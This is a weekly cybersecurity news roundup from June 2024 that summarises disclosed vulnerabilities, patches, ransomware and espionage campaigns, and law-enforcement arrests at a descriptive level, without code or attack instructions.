14 June 2024

Cyber Security Week in Review: June 14, 2024


Cyber Security Week in Review: June 14, 2024

Arm warns of actively exploited Mali GPU zero-day

British semiconductor and software design company Arm has patched a high-severity vulnerability in the Arm Mali GPU Kernel driver said to have been exploited in the wild. The flaw, tracked as CVE-2024-4610, is a use-after-free issue that can be abused by a local user for code execution with elevated privileges. The flaw impacts Bifrost GPU Kernel Driver: all versions from r34p0 to r40p0 and Valhall GPU Kernel Driver: all versions from r34p0 to r40p0. The vulnerability was addressed with the release of Bifrost and Valhall GPU Kernel Driver r41p0.

Microsoft patches over 50 vulnerabilities

Microsoft has released security updates as part of its June 2024 Patch Tuesday that address over 50 vulnerabilities across various software products. While this month’s Patch Tuesday doesn’t include patches for zero-day flaws, it fixes a number of high-risk vulnerabilities.

In separate news, Google released the June 2024 Android Security Bulletin to patch multiple security issues, including a zero-day vulnerability that, according to the vendor, “may be under limited, targeted exploitation.” Tracked as CVE-2024-32896, the bug is an improper input validation issue in the Pixel Firmware subcomponent that can be exploited by local application for code execution.

Black Basta ransomware actors possibly exploited recently patched Windows bug as zero-day

New evidence suggests that the cybercrime group known as Cardinal (aka Storm-1811, UNC4393), operators of the Black Basta ransomware, may have exploited a recently patched Windows privilege escalation vulnerability (CVE-2024-26169) as a zero-day.

The vulnerability, found in the Windows Error Reporting Service, allows attackers to elevate their privileges on affected systems. The issue was patched by Microsoft on March 12, 2024, with no known exploitation in the wild at that time.

TellYouThePass ransomware weaponizes recently patched PHP flaw

The recently patched critical PHP vulnerability has been actively exploited to deliver malware as part of the “TellYouThePass” ransomware campaign. Tracked as CVE-2024-4577, the flaw is an OS command injection issue that could allow remote command execution. The vulnerability stems from an incomplete fix for the CVE-2012-1823 bug. Imperva’s analysis identified several campaigns exploiting the CVE-2024-4577 vulnerability, including attempts to upload WebShells and deploy ransomware.

Chinese hackers breached 20K+ FortiGate systems worldwide in Coathanger campaign

A Chinese cyberespionage campaign that compromised the Netherlands’ defense ministry in February this year was much broader than initially believed, the Dutch authorities revealed this week.

According to the country’s national cybersecurity center, the threat actor behind the campaign gained access to at least 20,000 Fortinet FortiGate systems worldwide within a few months in both 2022 and 2023 using a then zero-day vulnerability tracked as CVE-2022-42475. The Dutch authorities said that the threat actor was aware of the vulnerability in FortiGate systems for at least two months before the public disclosure. During “so-called ‘zero-day’ period” the group infected 14,000 devices, with targets including Western governments, international organizations and a large number of companies within the defense industry.

Sticky Werewolf threat group targets aviation industry in Russia and Belarus

A threat actor tracked as “Sticky Werewolf,” suspected of having geopolitical and/or hacktivist motivations has been linked to cyber campaigns targeting public organizations in Russia and Belarus since at least April 2023. Sticky Werewolf’s most recent operation, detailed by Morphisec Labs, has been targeting aviation industry in Russia and Belarus. The group has been sending emails purportedly from the First Deputy General Director of AO OKB Kristall, a Moscow-based company involved in aircraft and spacecraft production and maintenance.

New DarkPeony campaign abuses MSC files to deliver PlugX malware

A threat actor known as DarkPeony has been observed abusing Microsoft Management Console (MSC) files to deliver malware in a new campaign. The operation, dubbed ‘Operation ControlPlug’by NTT’s security team, is aimed at military and government organizations in Myanmar, the Philippines, Mongolia, and Serbia.

UNC5537 hackers target Snowflake customers for data theft and extortion

A financially motivated threat actor, known as UNC5537, is targeting Snowflake customer database instances in a broad campaign aimed at data theft and extortion. The investigation into multiple security incidents involving Snowflake customers showed that UNC5537 gained access to organizations’ Snowflake customer instances using stolen credentials obtained via infostealer malware campaigns (VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA and METASTEALER) that infected non-Snowflake owned systems.

Arid Viper infects Android apps with AridSpy

ESET researchers have uncovered espionage campaigns likely conducted by the Arid Viper APT group, targeting Android users in Egypt and Palestine since 2022. These campaigns use a sophisticated Android spyware, dubbed AridSpy, which is distributed via websites mimicking messaging apps, a job opportunity app, and a Palestinian Civil Registry app. AridSpy operates in multiple stages, downloading additional payloads from a command-and-control server to evade detection. The malware enables remote control and focuses on stealing user data. ESET said it has identified six instances of AridSpy in the targeted regions, with three campaigns still active.

Pakistan-linked malware campaign targets Indian defense, IT sectors

Cisco Talos has detailed a long-running malware campaign called “Operation Celestial Force,” active since at least 2018 and targeting Indian entities, particularly in defense, government, and technology sectors. This campaign employs GravityRAT, initially a Windows-based malware, later expanded to target Android devices. Another malware, HeavyLift, is used as a loader, with both managed by a tool called “GravityAdmin.” Talos attributes this operation to a Pakistani threat actor group named “Cosmic Leopard,” focused on espionage and surveillance.

In a separate report, cybersecurity firm Volexity said it discovered a cyber-espionage campaign by a suspected Pakistan-based threat actor known as UTA0137. This campaign uses malware named DISGOMOJI, written in Golang and designed for Linux systems. Volexity believes with high confidence that UTA0137's objectives are espionage-related, specifically targeting government entities in India.

North Korean threat actors are responsible for one-third of the phishing attacks in Brazil

Mandiant released a report on Brazil cyber ecosystem, according to which North Korean threat actors are responsible for one-third of the phishing attacks in Brazil, focusing on cryptocurrency firms, aerospace and defense sectors, and government entities. Over 85% of government-backed phishing activities are attributed to threat actors from China, North Korea, and Russia. Chinese groups primarily target Brazilian government organizations and the energy sector. Russian espionage has a long history in Brazil but has diminished since Russia's invasion of Ukraine, as efforts have shifted towards Ukrainian and NATO targets, the report noted.

Sleepy Pickle technique targets ML models

Security researchers have developed a new exploitation technique named 'Sleepy Pickle,' which targets machine learning (ML) models. This hybrid attack exploits the widely used but insecure Pickle file format, commonly employed for packaging and distributing ML models. Unlike previous attacks that compromise an organization's systems during model deployment, Sleepy Pickle directly compromises the ML model itself. This enables attackers to target the end-users who utilize the compromised model, broadening the scope and potential impact of the attack.

The French govt exposes pro-Russian information manipulation campaign Matryoshka

A technical report by VIGINUM details “Matryoshka,” a pro-Russian information manipulation campaign. This campaign aimed to discredit Western news media, public figures, and fact-checking organizations through coordinated efforts on social media. The report highlights the sophisticated strategies used to undermine trust in these institutions and promote pro-Russian narratives.

Ransomware actors breached Ascension systems after an employee downloaded a malicious file

Ascension, a major US healthcare system, said that the ransomware attack in May 2024 was a result of an employee inadvertently downloading a malicious file, mistaking it for legitimate. The attack affected MyChart electronic health records, phones, and systems for ordering tests, procedures, and medications. To contain the cyber incident Ascension took some devices offline on May 8.

TargetCompany ransomware gang targets ESXi environments with new Linux variant

The TargetCompany ransomware group has added a new Linux variant to its arsenal specifically targeting VMWare ESXi environments. The custom shell script not only deploys the ransomware payload but also exfiltrates the victim's information to two separate servers, ensuring the attackers have a backup of the stolen data, Trend Micro said.

Additionally, the cybersecurity company released a report on a sophisticated attack campaign targeting exposed Docker remote API servers to deploy cryptocurrency miners. Named “Commando Cat,” this campaign has been active since the beginning of 2024 and employs a series of steps to infiltrate systems and leverage their resources for mining digital currencies.

Ukraine neutralizes bot farms involved in hacking Ukrainian soldiers’ phones

The Security Service of Ukraine (SBU) has dismantled two bot farms used by Russian intelligence agencies to hack phones of Ukrainian military personnel and spread the pro-Kremlin propaganda. Two individuals suspected of running the farm were arrested.

Developer who worked for LockBit and Conti ransomware gangs arrested in Ukraine

Ukraine’s police have arrested a Kyiv resident who allegedly developed software for the notorious LockBit and Conti ransomware operations. the suspect developed so-called “cryptors” - specialized software designed to disguise computer viruses as safe files, hiding them from the most popular antivirus programs. These cryptors were used in the Conti ransomware attacks targeting computer networks of enterprises in the Netherlands and Belgium. Through their investigation, cyber police linked the suspect to the Russian hacker groups “LockBit” and “Conti,” both known for disabling industrial enterprises by encrypting computer networks to extort ransoms.

Turkish student arrested for using AI to cheat in exams

A Turkish student was arrested for using a sophisticated AI-powered system to cheat during a university entrance exam. Authorities noticed the student's suspicious behavior, leading to the discovery of a tiny camera hidden as a shirt button to scan questions, a router in the shoe sole to transmit images to an AI model, and an earpiece to receive answers. The setup included a mobile phone to relay information to an accomplice. Both the student and the accomplice have been detained and face serious charges, with the student currently in jail awaiting trial.

Microsoft delays the release of its Windows Recall feature due to security concerns

Microsoft has announced a delay in the release of its AI-powered Recall feature for Copilot+ PCs due to security concerns. Initially set for broad preview on June 18, 2024, the feature will now be available first through the Windows Insider Program (WIP) in the coming weeks. The Recall feature captures screenshots of active windows every few seconds, analyzes them using an Azure AI model, and stores the data in a SQLite database for easy human language search retrieval. Despite Microsoft’s assurances of Bitlocker encryption for security, privacy advocates and cybersecurity experts have raised concerns about potential abuse and data theft, prompting the delay for further testing and quality assurance.

Back to the list

Latest Posts

Daggerfly APT targets Taiwanese orgs and US NGO in China with upgraded malware arsenal

Daggerfly APT targets Taiwanese orgs and US NGO in China with upgraded malware arsenal

The attackers exploited a bug in an Apache HTTP server to deliver the MgBot malware.
23 July 2024
New FrostyGoop ICS malware left over 600 apartment buildings in Ukraine without heat

New FrostyGoop ICS malware left over 600 apartment buildings in Ukraine without heat

The attackers likely gained access through a vulnerability in an externally facing Mikrotik router.
23 July 2024
NCA infiltrates, disrupts Digitalstress DDoS-for-Hire service

NCA infiltrates, disrupts Digitalstress DDoS-for-Hire service

The crackdown follows the arrest of one of the site's suspected admins earlier this month.
23 July 2024